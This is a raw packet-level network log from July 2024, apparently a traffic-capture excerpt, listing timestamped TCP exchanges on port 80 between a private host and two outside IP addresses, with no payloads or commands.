                                                                Jul 5, 2024 04:23:09.549309969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.549324989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.652453899 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:09.652657986 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.653141975 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.657989025 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:09.874612093 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:09.874679089 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.988825083 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.989028931 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.994215965 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:09.994290113 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:09.994291067 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.994354010 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.994489908 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:09.999211073 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:10.430039883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.430094957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.430613995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.435666084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615165949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615180969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615194082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615220070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.615238905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615251064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.615261078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.615267992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.615387917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616079092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616127014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616137028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616141081 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616151094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616154909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616163969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616174936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616180897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616194010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616338015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616348028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616358995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.616381884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.616410017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.699589968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699609041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699619055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699645042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.699661016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.699825048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699836969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699851036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.699865103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.700171947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.700190067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.700206995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.700218916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706111908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706136942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706157923 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706170082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706217051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706229925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706239939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706253052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706255913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706291914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706590891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706631899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706640005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706681013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706686020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706721067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706916094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706963062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.706969023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.706994057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707005024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707020044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.707035065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.707079887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707092047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707112074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.707132101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.707921982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707981110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.707987070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.707998037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.708009005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.708019018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.708036900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.708048105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.717992067 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:10.718053102 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:10.718586922 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:10.730715036 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:10.782278061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782289982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782308102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782320976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.782340050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.782347918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.782423019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782437086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782450914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782464981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.782473087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.782506943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.790389061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790400028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790410995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790426016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790436983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790519953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.790800095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790810108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790819883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790851116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.790859938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.790867090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790878057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.790913105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.796878099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.796891928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.796904087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.796936035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.796973944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.797111034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797123909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797135115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797162056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.797188044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.797204971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797219038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797230959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.797250986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.797276974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.798079014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798091888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798105955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798139095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.798152924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.798176050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798190117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798202991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.798224926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.798254013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.799077034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799091101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799114943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799127102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799139023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.799139977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799154997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.799169064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.799177885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.799206972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.800040960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800052881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800065994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800093889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.800122023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800126076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.800133944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800148964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.800168037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.800187111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.800218105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.801007032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801018953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801029921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801059008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801067114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.801094055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801100016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:10.801106930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:10.801156998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099148035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099162102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099172115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099252939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099252939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099271059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099282026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099317074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099447966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099493980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099515915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099526882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099555969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099566936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.099575043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099600077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099611044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.099642038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100044012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100092888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100097895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100110054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100136995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100198030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100208998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100219965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100230932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100244999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100263119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100291967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100295067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100303888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100312948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100337029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100357056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100397110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100409031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100418091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100430012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100438118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100441933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100454092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100465059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100466967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100483894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100486040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100509882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100528002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100536108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100541115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100553036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100564003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100577116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100604057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100701094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100712061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100723982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100734949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100735903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100749016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100759983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100764990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100770950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100783110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100790977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100795031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100806952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100810051 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100812912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100825071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100835085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100838900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.100847006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.100874901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101157904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101169109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101198912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101311922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101322889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101332903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101350069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101386070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101478100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101490021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101500034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101511002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101512909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101521969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101532936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101536989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101547956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101557016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101561069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101572990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101577997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101584911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101596117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101600885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101608038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101627111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101722956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101733923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101742983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101752043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101754904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101759911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101768017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.101777077 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:11.101794004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101823092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.101824045 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.104094028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104104042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104115009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104140043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104142904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104172945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104280949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104291916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104327917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104491949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104502916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104513884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104538918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104547024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104557991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104568958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104578018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104593992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104604006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104613066 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104624987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104629040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104635954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.104664087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.104671955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.105458975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105473042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105484009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105511904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.105521917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105532885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105539083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.105545998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105557919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105566025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.105587006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.105626106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105637074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105648041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.105668068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.106437922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106447935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106456995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106467009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106471062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.106471062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.106487989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106498003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106503010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.106511116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.106528044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.106538057 CEST4973280192.168.2.485.28.47.30
